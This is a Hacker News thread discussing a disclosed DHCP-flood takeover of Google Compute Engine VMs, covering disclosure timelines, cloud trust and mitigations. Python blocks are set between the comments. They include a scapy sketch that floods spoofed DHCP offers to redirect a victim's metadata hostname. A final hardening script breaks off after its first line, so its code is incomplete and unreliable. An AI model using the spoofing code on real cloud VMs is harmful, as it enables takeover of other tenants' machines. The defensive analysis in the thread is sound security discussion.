[HN Gopher] Google Compute Engine VM takeover via DHCP flood
___________________________________________________________________
Google Compute Engine VM takeover via DHCP flood
Author : ithkuil
Score  : 442 points
Date   : 2021-06-29 10:16 UTC (12 hours ago)
(HTM) web link (github.com)
(TXT) w3m dump (github.com)
| gerdesj wrote:
| This is well worth reading. It describes how, through a series of well-meaning steps, you shoot yourself in the face.
| It all starts with:
| "Note that the last 4 bytes (0a:80:00:02) of the MAC address (42:01:0a:80:00:02) are actually the same as the internal IP address of the box (10.128.0.2). This means, 1 of the 3 components is effectively public."
| markus_zhang wrote:
| As someone who knows nothing about networking, can you please explain why they set up the config like this? Does that mean the third byte from the top must be 0a?
| BTW I just checked my corporate intranet setup and the MAC has nothing to do with the IP address.
| champtar wrote:
| In most (all?) public clouds you don't have real layer 2; having the MAC computed from the IP allows them to run a stateless ARP responder, I guess.
| markus_zhang wrote:
| Thanks! I don't understand the technical details but (combining multiple responses) I think I understand a bit now. I also remember that back when I was at university we used a sort of university intranet (every personal computer had to go through it to reach the Internet, but it was free anyway) and there were a lot of ARP attacks then, and I learned to use arp -a and arp -v (maybe wrong).
| gerdesj wrote:
| Quite. MAC addresses don't need to line up with IP addresses or vice versa. They are completely different things. However, in IPv6 there is a standard for link-local addresses that does have a correlation between IP and MAC, but there you go. It's designed to avoid clashes and is not the finest design decision ever made! That last will probably creep into a CVE one day, just like this chain of events.
| The config as designed probably looked like a good idea at the time. When you are worrying about millions of things in an address space like IPv4 and MAC, then having them tie up in some way may be useful for lookups in a very large database or two.
| However, giving information away about something that was never designed from the outset to do so is not a good idea.
| If you follow the chain of reasoning in the github post you can see that you can break the chain at multiple points by not "being clever". If you start by not making your IP addresses follow the MAC address, you kill this problem off before it starts.
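To make the correlation concrete: in the example quoted above, the MAC is a fixed 42:01 prefix followed by the four bytes of the VM's internal IPv4 address, so either value can be derived from the other. A minimal sketch in Python (the 42:01 prefix is taken from the quoted example and is illustrative, not a documented guarantee):

    import ipaddress

    def mac_to_ip(mac: str) -> str:
        """Recover the internal IP embedded in a GCE-style MAC address."""
        octets = mac.split(":")                            # 42:01:0a:80:00:02
        ip_bytes = bytes(int(o, 16) for o in octets[2:])   # last 4 bytes
        return str(ipaddress.IPv4Address(ip_bytes))

    def ip_to_mac(ip: str) -> str:
        """Predict the MAC for a given internal IP (the reverse direction)."""
        packed = ipaddress.IPv4Address(ip).packed
        return "42:01:" + ":".join(f"{b:02x}" for b in packed)

    assert mac_to_ip("42:01:0a:80:00:02") == "10.128.0.2"
    assert ip_to_mac("10.128.0.2") == "42:01:0a:80:00:02"

This is why knowing (or guessing) a victim's internal IP removes one of the three unknowns an attacker would otherwise have to brute-force.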
| gerdesj wrote:
| At the risk of becoming a real bore, I'll spell out why I think this is a really, really dumb thing:
| If you have anything to do with fire fighting (and we all do in a way) you soon learn that there are three things required for a fire:
|   * Something to burn
|   * Air (strictly speaking: oxygen)
|   * Something to start the fire (a source of ignition)
| Fire prevention is based around avoiding having all three things together at any point in time. So, putting out a fire often involves removing the oxygen or removing the burning thing. Prevention can be as simple as making a rule at home that no one puts dish cloths on the hob to dry. That last phrase may need some translating!
| So, you put your webby app or VM out on the internets for all to see and play with. Unlike your home front door, every Tom, Dick and Harry in the world can go and take a playful kick at it. So you need to take some care with it. There is no simple set of three factors that you can protect against as there is for fire prevention. Instead you need to follow some good practice and hope for the best.
| One good (not best - there is no such thing) practice is to avoid giving away information unnecessarily. Linking IP to MAC is such a thing. Do it at home if you must, but don't do it in public.
| tovej wrote:
| The automatic host numbering feature in the IPv6 standard (modified EUI-64, RFC 4291) was a big mistake. But I thought that worked the other way? That the MAC was part of the IP, not the IP part of the MAC.
| markus_zhang wrote:
| Thanks! This is a good point. Yeah, I kind of understand why they made the initial decision back then -- much easier to implement.
| Sebb767 wrote:
| It's so strange to me that they have a process for adding a root key that involves no authentication at all. These are VMs with their images running their pre-installed software; it's not like this would have been a hard problem.
| champtar wrote:
| In GKE it allowed going from a hostNetwork pod to root on the node: http://blog.champtar.fr/Metadata_MITM_root_EKS_GKE/
| joelbondurant wrote:
| Communist data is public property.
| zomgwat wrote:
| If I understand correctly, the attack can be mitigated with the appropriate level of firewall rules. Both ingress and egress traffic should be blocked by default and selectively allowed based on need. In this case, DHCP traffic would only be allowed to 169.254.169.254.
| You still have somebody in your network though, so there's that.
| rantwasp wrote:
| That's not how DHCP works. In the context of a machine coming up or renewing a lease, it's basically a broadcast, and anyone on the network can reply. The traffic needs to happen on the interface where you get the IP (guessing the main interface is also using DHCP).
| zomgwat wrote:
| How does traffic reach or leave the machine if a network-level firewall is restricting access? It seems I have a fundamental misunderstanding of something.
| rantwasp wrote:
| If you have a network-level firewall blocking DHCP traffic, you will not be able to do DHCP.
| The way it works for physical hosts is that all machines in the same rack see the DHCP traffic, and the ToR (top-of-rack switch) has a special IP helper configured to which it sends the DHCP traffic. So it's broadcast in the rack and point-to-point after that, but there is still zero to no security when it comes to DHCP traffic.
| For VMs, I guess the hypervisor acts as the ToR, with the same limitations.
| res0nat0r wrote:
| Essentially this:
| > The firewall/router of GCP blocks broadcast packets sent by VMs, so only the metadata server (169.254.169.254) receives them. However, some phases of the DHCP protocol don't rely on broadcasts, and the packets to be sent can be easily calculated and sent in advance.
| > To mount this attack, the attacker needs to craft multiple DHCP packets using a set of precalculated/suspected XIDs and flood the victim's dhclient directly (no broadcasts here). If the XID is correct, the victim machine applies the network configuration. This is a race condition, but since the flood is fast and exhaustive, the metadata server has no real chance to win.
| > Google heavily relies on the Metadata server, including the distribution of ssh public keys. The connection is secured at the network/routing layer and the server is not authenticated (no TLS, clear http only). The google_guest_agent process, which is responsible for processing the responses of the Metadata server, establishes the connection via the virtual hostname metadata.google.internal, which is an alias in the /etc/hosts file.
| He appears to spoof the DHCP packets to get the victim to talk to his rogue metadata server, inserts the IP address of his metadata server into the /etc/hosts entry for metadata.google.internal, and is then able to have his ssh pubkey installed on the victim so he can ssh into the host.
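For readers wondering what "crafting multiple DHCP packets using precalculated XIDs" looks like in practice, here is a rough sketch with scapy. The interface, addresses, and XID search space are hypothetical placeholders, and a real exploit also has to answer the subsequent DHCPREQUEST and stand up a rogue metadata server; this only illustrates the unicast flood itself:

    from scapy.all import BOOTP, DHCP, IP, UDP, Ether, sendp

    VICTIM_MAC = "42:01:0a:80:00:02"  # derivable from the internal IP, see above
    VICTIM_IP = "10.128.0.2"
    ROGUE_SRV = "10.128.0.100"        # attacker-controlled box on the same network

    def offer(xid: int) -> Ether:
        """One unicast DHCPOFFER pretending to be the subnet's DHCP server."""
        return (Ether(dst=VICTIM_MAC) /
                IP(src=ROGUE_SRV, dst=VICTIM_IP) /
                UDP(sport=67, dport=68) /
                BOOTP(op=2, xid=xid, yiaddr=VICTIM_IP,
                      chaddr=bytes.fromhex(VICTIM_MAC.replace(":", ""))) /
                DHCP(options=[("message-type", "offer"),
                              ("server_id", ROGUE_SRV),
                              # the write-up abuses the hostname option: the
                              # google_set_hostname hook (see tytso's comment
                              # further down) writes it into /etc/hosts
                              ("hostname", "metadata.google.internal"),
                              ("lease_time", 600),
                              "end"]))

    # Flood every XID the victim's dhclient could plausibly have chosen
    # (candidates derived from the guessed pid and boot time, per the write-up).
    candidate_xids = range(0x10000, 0x18000)  # placeholder search space
    sendp([offer(x) for x in candidate_xids], iface="eth0", verbose=False)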
| willvarfar wrote:
| Has it been verified that GCE is still vulnerable?
| There's clearly a communication gap between the researcher and Google. But perhaps the techies at Google saw it and fixed it and it just hasn't been communicated, or some other change in GCE has closed it or mitigated it?
| SahAssar wrote:
| The author asked for an update on 2021-06-08, 8 months after reporting it. If they had fixed it, why wouldn't they say so?
| remus wrote:
| While it certainly seems like a fairly serious vulnerability, I think it's worth highlighting that this attack requires that either you already have access to a machine on the same subnet as the target machine, or that the firewall in front of the target machine is very lax. That's a pretty high bar for getting the attack to work in the wild.
| cmeacham98 wrote:
| Note that "have access to a machine on the same subnet" really just means "can send traffic to the VM's local network". In other words, partial compromises (e.g. a docker container, VM, or chroot) that have access to this network are enough, as are attacks that let you send traffic (e.g. TURN server abuse).
| asah wrote:
| -1: consider if you have complex vendor software on a GCE VM inside a larger GCP project... now a vulnerability in that vendor software means the whole GCP project is exposed. Vendor fixes are notoriously slow, so in practice you have to isolate vendor software in separate GCP projects.
| Real example: I have a client with precisely this situation, and elsewhere in the GCP project is PII consumer data requiring public disclosure if exposed.
| mywittyname wrote:
| Luckily, GCE limits the Cloud API access available to an instance to nothing by default. Meaning that access to BigQuery, Storage, SQL, user management, etc. is not allowed from that VM, even with root access to the VM, unless configured by the administrator.
| This at least mitigates the impact of this exploit to a degree. If a web server has access only to Cloud SQL, an attacker cannot use access to that VM to go digging around in Cloud Storage buckets unless GCS access is granted explicitly to the VM.
| From there, IAM security applies. So even if the VM has Cloud API access to, say, BigQuery, the limitations of that service account then apply to any data that is accessed.
| asah wrote:
| I thought this attack allows one VM to take over another VM, and the victim VM (the software on that VM...) talks with those services?
| mukesh610 wrote:
| > elsewhere in the project is PII
| Servers holding PII should be firewalled off. Necessary traffic should be explicitly granted. That would remedy the issue a bit.
| asah wrote:
| IIUC this is insufficient (!) - even with a firewall between them, a VM is now vulnerable to attack from another VM on the subnet (in the same GCP project).
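mywittyname's point above is easy to check from inside a VM: the identity and scopes an instance can use come from the very metadata service this attack spoofs. A quick query against the documented GCE metadata endpoints, shown with plain urllib:

    import urllib.request

    METADATA = "http://169.254.169.254/computeMetadata/v1"

    def metadata(path: str) -> str:
        # The Metadata-Flavor header is mandatory; it blocks naive SSRF.
        req = urllib.request.Request(f"{METADATA}/{path}",
                                     headers={"Metadata-Flavor": "Google"})
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.read().decode()

    # What could an attacker do with this VM's identity?
    print(metadata("instance/service-accounts/default/email"))
    print(metadata("instance/service-accounts/default/scopes"))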
| mywittyname wrote:
| Most of my GCP clients shove PII into a GCP service, like BQ. It's not put on a "server" per se, so firewall rules don't really apply here. The appropriate thing to assert is that the necessary IAM permissions should be granted explicitly.
| This is usually the case, as most of my clients use isolated GCP projects for housing PII data. This forces IAM permissions to be granted to service accounts, which, _hopefully_, means that administrators are cognizant of the levels of access that they are granting to service accounts.
| Not a guarantee, mind you, but hopefully some red flags would be raised if someone requested PII-level access for a service account associated with a public-facing web server.
| remus wrote:
| I completely agree and didn't mean to suggest it wasn't a serious vulnerability: as I understand it, this attack means that if any VM in the subnet is compromised, that can be leveraged into an attack on any VM in the subnet, so your attack surface has suddenly gotten a lot bigger and your isolation between VMs substantially poorer.
| exitheone wrote:
| I think the real lesson here is not to colocate different things in a single GCP project. AFAIK projects don't cost anything, so why not create one per service?
| asah wrote:
| The way you're wording this suggests that this was a sensible design prior to this vulnerability, but in fact all sorts of tools, config, etc. work within a project but not across projects, including IAM. Yes, obviously anything can be duplicated, but it's a big pain.
| Probably easier to create separate subnets for VMs that don't trust each other?
| briffle wrote:
| IAM works across projects easily. The "Organization" concept in Google Cloud is used to collect projects, and to manage permissions for groups (or subfolders) of projects very easily.
| rantwasp wrote:
| The real lesson for me is to not use GCP. Sounds harsh, but you don't get second chances when it comes to trust in this context.
| tryauuum wrote:
| I wonder if they have actually tested the last scenario:
| > Targeting a VM over the internet. This requires the firewall in front of the victim VM to be fully open.
| I mean, even if the firewall is nonexistent, can you really carry a DHCP payload over the public internet?
| EDIT: still haven't read the whole thing, but it looks like they did test it.
| pmontra wrote:
| They did test that scenario:
| https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-3
| tryauuum wrote:
| Google should probably block these kinds of packets, anything from/to UDP ports 67/68. Might be a little harsh, but secure.
| asah wrote:
| Same subnet = as another VM in your project? Or a random GCP VM that happens to share your subnet? Seems like pretty different risk levels...
| https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-s...
| Rockslide wrote:
| It literally says "same project" right there.
| asah wrote:
| Thanks. Sorry, just wanted to be completely sure.
| kl4m wrote:
| The usual configuration is one or many subnets per VPC, and one or many VPCs per project. A Shared VPC setup between projects is also possible but requires prior agreement from both projects.
| sparkling wrote:
| Very creative approach, never thought of such an attack vector.
| tryauuum wrote:
| Yeah. I knew that some parts of DHCP are IPv4 and unicast... but to carry such a packet over the internet, what a bold move.
| londons_explore wrote:
| This attack allows an adversary to move from root permissions on one VM in a GCP project to gaining root permissions on another VM in the same project.
| The attack is unlikely to succeed unless the attacker knows the exact time a particular VM was last rebooted, or can cause a reboot.
| Overall, this attack alone probably won't be the reason you will have to start filling in a GDPR notification to your users...
| addingnumbers wrote:
| I'm super confused by the statement "The unix time component has a more broad domain, but this turns out to be not a practical problem (see later)."
| I don't know what exactly he expected us to "see later," except that he knows exactly when the target machine rebooted, down to a 15-second window, because he already had full control over it before starting the attack...
| londons_explore wrote:
| I can imagine cases where an attacker could have good knowledge of the reboot time of a system. For example, they could ping it for months waiting for a maintenance reboot.
| Or they could flood the machine with requests, hoping to cause some monitoring system or human to reboot it.
| But overall, it seems unlikely...
| Arnavion wrote:
| > I don't know what exactly he expected us to "see later,"
| See all mentions of "Attack #2".
| darkwater wrote:
| Well, it can be used in a chain of attacks to jump from one compromised, external-facing machine to another, internal-only one that might hold more sensitive data. Or to run some inside job (although in that case developers should not be able to spin up a VM in production).
| rafaelturk wrote:
| Apparently the Google Project Zero timeline only applies to others...
| viraptor wrote:
| I think you're mixing up the projects a bit. This vulnerability doesn't seem to be going via Project Zero. Other Google teams are known to sometimes not react in time, and when reports go through Project Zero, they are disclosed at 90 days regardless of whether the project is internal or not. (I remember an unpatched Chrome vulnerability was published by Project Zero at the end of the deadline.)
| So the Zero timeline applies to everyone the same. It doesn't mean fixes actually happen on the same timeline.
| emayljames wrote:
| The parent comment is referring to the double standard: one rule for Google disclosing others' vulns, another for their own vulns.
| atatatat wrote:
| Was this found by, or originally reported to, Project Zero?
| manquer wrote:
| Precisely the point the OP is making. The rules for Project Zero are different, not that Project Zero is applying them differently.
| UncleMeat wrote:
| 90 days is fairly common in the industry, but not universal. GPZ is definitely not uniquely strict on disclosures.
| manquer wrote:
| That's not the problem. It is not that Project Zero is strict.
| The researcher here allowed 9 months for them to fix. Should he have disclosed after 90 days? Clearly Google didn't use the time to fix.
| It looks bad when you have a hard policy to disclose but not to fix.
| UncleMeat wrote:
| He could have if he wanted to. He could have disclosed immediately if he wanted to.
| _Google_ does not have a hard policy to disclose. GPZ does. Vulns in external products found through other groups within Google do not share all the same processes as GPZ.
| manquer wrote:
| GPZ is not some independent entity Google just funds; they are as much a part of Google as any other team.
| If you want to be that precise, it is a bad look for part of your organization to have a hard policy that you expect external companies to follow, while parts of your organization itself cannot do the same.
| I am not saying Project Zero is wrong. Clearly, giving more time did not prod Google into actually fixing this in a timely way; he certainly was being too polite and gave too much time. I don't know why; perhaps companies don't pay bounties if you disclose without their consent [2]?
| All I am saying is that Google as a company should hold itself to the same hard standard and fix issues in 90 days, as this is what Google Project Zero as a team expects other companies [1] to do; they will even reject requests for extensions.
| As a company, if they can't do it, they shouldn't expect others to do it either, right? Or they should disclose reported vulnerabilities even if not fixed in 90 days.
| [1] Maybe they do it for internal teams as well, but that's not relevant to us; all we should be concerned with is how they behave externally with disclosing and solving issues.
| [2] Perhaps part of the reason GPZ is able to have this hard policy is that they don't depend on bug bounties as a source of income, as independent researchers do.
| jrockway wrote:
| > The researcher here allowed 9 months for them to fix.
| The researcher is basically allowed to do whatever they want here. They can wait 0 days and just post to the full-disclosure mailing list. Or they could never disclose it.
| Personally, I've done both. I took DJB's "Unix Security Holes" class, where we had to find 10 vulnerabilities in OSS as the class's final project. All of those got 0-day disclosed, because that is how DJB rolls. I've also independently found bugs, and I was satisfied by the resolution from emailing security@ at that company.
| breakingcups wrote:
| Their point is, Project Zero is a very public Google project to hold other companies (and yes, themselves too) accountable with disclosure policies Google (as a company) presumably stands behind. Thus it is quite ironic for an issue to not be fixed _in a year_.
| Yes, sometimes other Google teams miss the deadline set by Project Zero too. That's not the point.
| [deleted]
| jsnell wrote:
| The timeline for disclosure is set by the reporter, no? "We will disclose this bug on YYYY-MM-DD". The other side can ask for an extension, but has no intrinsic right to one. Unless I am missing something, this has nothing to do with PZ, so their default timeline is totally irrelevant.
| Cthulhu_ wrote:
| I believe PZ can set the terms of reasonable disclosure (and the like) as a condition for paying out.
| manquer wrote:
| Depends on whether you want to get paid. Many organizations will not pay bug bounties if you disclose before they fix, or without their consent.
| Project Zero probably doesn't care, or doesn't even accept the bounties.
| jsnell wrote:
| The post had no indication of a bounty being held hostage. From https://www.google.com/about/appsecurity/reward-program/ it seems like the requirement for a bounty is not "don't disclose before a fix is released", but "don't disclose without reasonable advance notice".
| So I just don't see the inconsistency here. Project Zero gives a disclosure deadline. The reporter here chose not to give one. When they said they wanted to disclose, there was no stalling for extra time. Just what is the expectation here?
| tptacek wrote:
| This superficial dismissal doesn't even make sense. Google didn't control the disclosure timeline here. The people who found these vulnerabilities could have published on T+90, or, for that matter, T+1. Meanwhile, the norm that does exist (it's a soft norm) is that you respect the disclosure preferences of the person who reports the vulnerability to the extent you reasonably can.
| I'm not sure I even understand the impulse behind writing a comment like this. Assume Google simply refuses to apply the P0 disclosure rule to itself (this isn't the case, but just stipulate). Do you want them to _stop_ funding Project Zero? Do you wish you knew less about high-profile vulnerabilities?
| Sebb767 wrote:
| He first reported the issue on 2020-09-26 [0], nearly a year ago.
| [0] https://github.com/irsl/gcp-dhcp-takeover-code-exec#timeline
| _trampeltier wrote:
| Love the 2020-12-03: ... "holiday season coming up"
| [deleted]
| [deleted]
| southerntofu wrote:
| > any security-conscious GCP customers
| Does that exist? In my book, if you're security-conscious, you can only do self-hosting, whether on premises or in your own bay in a datacenter.
| Giving away your entire computing and networking to a third party such as Google is orthogonal to security.
| AnIdiotOnTheNet wrote:
| I agree, but given how grey your text currently is, I think too many HNers' careers depend on the cloud for them to ever agree with us.
| throwaway3699 wrote:
| Most people's threat models do not assume Amazon or Google are threats. Especially when you sign very large contracts with them, the law is enough to keep them in check.
| dangerface wrote:
| That's the issue: Amazon and Google are dependencies that are overlooked as too big to fail. Anything overlooked because it "can't fail" is the perfect place to attack.
| _jal wrote:
| But if you don't, your threat model is a work of fiction and you're wasting your time play-acting.
| A threat model has no basis in reality if you do not accurately model threats, and your infra vendor is a glaringly obvious threat. Now, maybe that's a risk worth the tradeoffs, but how do you know that?
| shiftpgdn wrote:
| You should absolutely consider your cloud provider a threat. What happens in a black swan event where a provider is completely compromised? Design around zero-trust networks.
| dmos62 wrote:
| It's unreasonable to always design around not trusting any third party.
| southerntofu wrote:
| Sure, you must always put some level of trust in third parties. What level of trust is the important question. Ideally, you distribute that trust among several actors so a single compromise is not too much of a deal.
| That's why you use different hardware vendors for your routers and servers, another vendor for your network connectivity, and yet other vendors for your software. This way, MITM is mitigated by TLS (or equivalent) and server compromise is mitigated by a good firewall and network inspection stack. Placing all your eggs in a single Google basket is giving a lot of power to a single "don't be evil" corporation, who may get hacked or be compelled by law enforcement to spy on you and your clients.
| ClumsyPilot wrote:
| Do it right, and you might mitigate threats; do it wrong, and you are introducing more points where you could be compromised - a single supplier can be audited, a hundred cannot.
| SEJeff wrote:
| It really depends on your threat model. It is not always unreasonable.
| Target trusted their HVAC management firm so much that it had full unsegmented access to the LAN in each store. The credit card swipe terminals on the same LAN were totally compromised and millions of users had their credit card credentials stolen.
| Defense contractors and places that store or manage large amounts of money are totally within their mandates to trust no one, not even many of their own employees.
| alksjdalkj wrote:
| Did Target really trust their HVAC firm, or was their network just poorly segmented?
| SEJeff wrote:
| Both.
| Someone hacked their HVAC firm to hack Target's credit swipe terminals.
| At the time it was the biggest hack in US history.
| alksjdalkj wrote:
| Right, I'm familiar with the hack. My point is Target almost certainly didn't decide that the HVAC firm could be trusted with access to the credit terminals - the fact that they had access was the result of poor security design, not Target's threat model.
| EricE wrote:
| I've often found poor security designs justified by many of the arguments in this thread, that it's unreasonable to treat everything as a threat.
| They know it's a bad design, but it doesn't matter because the threat is too improbable. Until it isn't :p
| SEJeff wrote:
| I've been in meetings where executives have said _precisely_ this, and I have tried to gently nudge them towards defense in depth.
| SEJeff wrote:
| Ok, fair. I see the lack of simple things like segmented VLANs as the lack of a threat model entirely. They trusted them implicitly, not explicitly, through their clear incompetence. Perhaps that's better?
| I think we are mostly in agreement.
| ClumsyPilot wrote:
| By all means, but then are you assuming that your suppliers are a threat? Did you check every chip on the motherboard that comes in, verify the firmware and BIOS on all components, including the firmware of webcams and SSDs? Who inspected the source code of every driver? Did you vet every employee, and what did you do about the Intel Management Engine?
| All these measures are not feasible unless you are working in national security or a megacorp, and insisting on one of them while ignoring the others is daft.
| __s wrote:
| > working in national security
| & for national security cases they're provided sovereign clouds
| alksjdalkj wrote:
| Supply chain is still an issue in sovereign clouds. At some point there's still a trust decision, whether that's to trust the cloud provider, the hardware manufacturer, the chip manufacturer, etc.
| fragmede wrote:
| For organisations with the resources to deal with an APT, great lengths are gone to in order to verify that the supply chain is trusted all the way down to the chip manufacturer. The hardware used isn't just bought from Best Buy and given a huge dose of trust; instead there are many, _many_ steps to verify that, e.g., the hard drives are running the expected firmware version. You spend as much as you can on the whole process, but if your threat model includes the CIA, China, and the FSB, it's exceedingly expensive.
| alksjdalkj wrote:
| I wish that were true, but it's really not. At least not within the public sector; maybe wealthier private firms can afford to do that level of verification.
| Anyway, even then you still need to make trust decisions. How do you verify the ICs in your HDD haven't been tampered with? How do you know the firmware wasn't built with a malicious compiler? Or that a bad actor didn't add a backdoor to the firmware? Realistically, there are a lot of components in modern computers that we have no choice but to trust.
| SEJeff wrote:
| Confidential computing (Intel SGX, ARM TrustZone, AMD SEV-SNP) handles this by encrypting the virtual machine's memory, so that even having full root on the host does not expose VM compute or memory.
| There are plenty of ways to do zero-trust networking; a slick commercial implementation is https://tailscale.com/, which you can totally use in the cloud for secure node-to-node comms if you're worried about those things.
| q3k wrote:
| > Confidential computing (Intel SGX, ARM TrustZone, AMD SEV-SNP) handles this by encrypting the virtual machine's memory so that even having full root on the host does not expose VM compute or memory.
| Google's current confidential compute offering does not prove at runtime that it's actually confidential. You just get a bit in your cloud console saying 'yep, it's confidential' (and some runtime CPU bit too, but that's easily spoofable by a compromised hypervisor), but no cryptographically verifiable proof from AMD that things actually are confidential.
| SEJeff wrote:
| Yes, Google tries to abstract SEV from you, but it is SEV-SNP that we really need for this. Our account manager confirmed they're not offering SEV-SNP yet.
| But you know this for metropolis, right? :)
| antoncohen wrote:
| While there are a series of vulnerabilities here, none of them would be exploitable in this way if the metadata server were accessed via an IP instead of the hostname metadata.google.internal.
| The metadata server is documented to be at 169.254.169.254, always[1]. But Google software (agents and libraries on VMs) resolves it by looking up metadata.google.internal. If metadata.google.internal isn't in /etc/hosts, as can be the case in containers, this can result in actual DNS lookups over the network to get an address that should already be known.
| AWS uses the same address for their metadata server, but accesses it via the IP address and not some hostname[2].
| I've seen Google-managed DNS servers (in GKE clusters) fall over under the load of Google libraries querying for the metadata address[3]. I'm guessing Google wants to maintain some flexibility, which is why they are using a hostname, but there are tradeoffs.
| [1] https://cloud.google.com/compute/docs/internal-dns
| [2] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance...
| [3] This is easily solvable with Kubernetes HostAliases that write /etc/hosts in the containers.
| tryauuum wrote:
| I think even without the metadata server replacement this attack would still be painful. The ability to reconfigure the network on a victim sounds painful by itself.
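antoncohen's observation suggests a cheap runtime sanity check: hard-code the documented address and treat any other resolution of the alias as a red flag, since a mismatch is exactly the symptom of the /etc/hosts poisoning described in the write-up. A minimal sketch:

    import socket

    EXPECTED = "169.254.169.254"

    # gethostbyname consults /etc/hosts via NSS before falling back to DNS,
    # so a poisoned hosts entry shows up here.
    resolved = socket.gethostbyname("metadata.google.internal")
    if resolved != EXPECTED:
        raise SystemExit(f"metadata.google.internal -> {resolved}, "
                         f"expected {EXPECTED}")
    print("metadata alias looks sane")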
| antoncohen wrote:
| That is true. I was thinking specifically about the metadata and SSH keys. But DHCP can also set DNS servers, NTP servers, and other things that can either cause disruptions or be used to facilitate a different attack.
| There might also be a persistence issue: it seems like part of this attack was that the IP was persisted to /etc/hosts even after the real DHCP server took over again. But even just writing to /etc/hosts could open the door to redirecting traffic to an attacker-controlled server.
| aenis wrote:
| It does not even take a lot. I run a production service on Cloud Run; the typical load is around 500 qps, and the DNS queries to resolve the metadata server fail frequently enough for this to be noticeable.
| bradfitz wrote:
| Even Google's Go client for the GCE metadata uses an IP address:
| > Using a fixed IP makes it very difficult to spoof the metadata
| https://github.com/googleapis/google-cloud-go/commit/ae56891...
| skj wrote:
| Hmm, Cloud Build spoofs it :) If the customer build accessed the underlying VM's metadata it would be very confusing (though not a security issue).
| It was not straightforward. I learned a lot about iptables and docker networking.
| corty wrote:
| Why the hell isn't the metadata server authenticated, e.g. via TLS certificates?
| londons_explore wrote:
| So why isn't the metadata server authenticated?
| It would seem simple enough for Google's metadata server to have a valid HTTPS certificate and be hosted on a non-internal domain. Or use an internal domain, but make pre-built images use a custom CA.
| Or Google could make a 'trusted network device', rather like a VPN, which routes traffic for 169.254.169.254 (the metadata server IP address) and adds metadata.google.internal to the hosts file as 169.254.169.254.
| rantwasp wrote:
| How do you get the certs to the machines? Ever had to rotate certs for all the machines in a datacenter?
| londons_explore wrote:
| To the metadata servers? They presumably hold keys to access all kinds of backend systems anyway. The certs don't require any additional trust. There must already be infrastructure in place for deploying said keys.
| rantwasp wrote:
| Yes and no. When doing stuff like this you will always have a chicken-and-egg problem.
| nijave wrote:
| You could also do a hybrid where each machine gets a volume with an x509 cert and key that only root has access to, which can then be used to mTLS to a network service (which can then manage the certs).
| That'd be a hybrid of a cloud-init data volume and a network service.
| rantwasp wrote:
| You could; the problem with this approach is how you manage these volumes and the infrastructure around them. How do you get the keys onto that volume?
| Usually, this trust is established when the machine is built the first time and it gets an identity and a cert assigned to it. You have the same problems (of how you control the infra and ensure that you, and only you, can do this on the network).
| staticassertion wrote:
| https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configur...
| Not mTLS, but AWS metadata v2 has moved to an authenticated, session-based system. Of course, an attacker who can make arbitrary requests can create tokens for limited sessions, but it's certainly an improvement.
| nijave wrote:
| Google happens to have a widely trusted CA they could sign the metadata server cert with.
| rantwasp wrote:
| My question is: if the CA cert needs to be rotated, how do you do that for all machines? It can be done, but it's not trivial.
| zokier wrote:
| The combination of DHCP, magic metadata servers, and cloud-init feels like such an awkward way of managing VM provisioning. I'm thinking: would having a proper virtual device, or maybe something at the UEFI layer, clean things up?
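For comparison, the session-token flow staticassertion links to above (AWS IMDSv2) looks roughly like this. It doesn't authenticate the server, but it does require every metadata read to carry a token minted via a PUT request, which kills one-shot request forgery. A sketch with plain urllib, runnable on an EC2 instance:

    import urllib.request

    IMDS = "http://169.254.169.254"

    # Step 1: mint a short-lived session token with a PUT request.
    req = urllib.request.Request(
        f"{IMDS}/latest/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    token = urllib.request.urlopen(req, timeout=2).read().decode()

    # Step 2: every subsequent metadata read must present the token.
    req = urllib.request.Request(
        f"{IMDS}/latest/meta-data/instance-id",
        headers={"X-aws-ec2-metadata-token": token})
    print(urllib.request.urlopen(req, timeout=2).read().decode())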
| CodesInChaos wrote:
| Metadata servers should not exist. An application having network access should not grant it any sensitive privileges.
| formerly_proven wrote:
| So I just read up on what this is and what they're for, and I can't help the feeling this is an "everything is a nail" design.
| CodesInChaos wrote:
| The traditional unix "everything is a file" approach would be much better than these metadata services.
| jcims wrote:
| Totally agree. A block device with the contents of the metadata service in it would be nice! It becomes trivial to provide at least basic access control to the service.
| rkeene2 wrote:
| This is done by some cloud software (e.g., OpenNebula). The downside is that modifying the metadata is now difficult, since hot-plugging block devices can cause issues if they are in use.
| cesarb wrote:
| The last time I helped administer a deployment on one of these clouds, one of the first things we did in the startup script for the instances was to install an iptables rule so that only uid 0 (root) could talk to the metadata servers. The need for that kind of firewall rule on every instance shows that these metadata servers are a bad design.
| It would be much better if, instead of the network, these metadata servers were only visible as a PCIe or MMIO device. Of course, that would require a driver to be written, so at least initially, unmodified distributions would not be usable (but after a few years, every Linux and BSD distribution, and perhaps even Windows, would have that driver by default). That way, it would (on Linux) appear as files in /sys, readable only by root, without requiring any local firewall.
| rjzzleep wrote:
| Is there a list of these mitigations somewhere?
| amluto wrote:
| There are ways for (virtual) firmware to expose data directly into sysfs, e.g. DMI and WMI. There are probably nicer ones, too. A virtio-9p instance exposing metadata would do the trick, too. Or a trusted emulated network interface.
| nijave wrote:
| vsock might be a good solution.
| rkeene2 wrote:
| OpenNebula solves this by attaching an ISO image with credentials and metadata to the CD-ROM virtual device, so only root can get the credentials needed to make calls, and the metadata is there too.
| edf13 wrote:
| It's far worse... the metadata can provision a new public ssh key to the VM (at will!).
| I wasn't aware of this single point of failure.
| tytso wrote:
| There's a really simple (albeit hacky) workaround which can be deployed fairly quickly. In /etc/dhcp/dhclient-exit-hooks.d/google_set_hostname replace this line:
|     if [ -n "$new_host_name" ] && [ -n "$new_ip_address" ]; then
| with this:
|     if [ -n "$new_host_name" ] && [[ ! "$new_host_name" =~ metadata.google.internal ]] && [ -n "$new_ip_address" ]; then
| (Yes, =~ is a bashism, but google_set_hostname is a bash script.)
| This prevents /etc/hosts from getting poisoned with a bogus entry for the metadata server. Of course, dhclient should also be fixed to use a better random number generator, and the firewall should by default stop DHCP packets from any IP address other than Google's DHCP server. Belt and suspenders, after all. But fixing the dhclient exit hooks is a simple text edit.
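The two firewall measures cesarb and tytso describe can be scripted at boot. A sketch applying them with iptables via subprocess; the assumption that GCE's DHCP replies originate from 169.254.169.254 matches the write-up but should be verified for your own VPC before relying on it:

    import subprocess

    RULES = [
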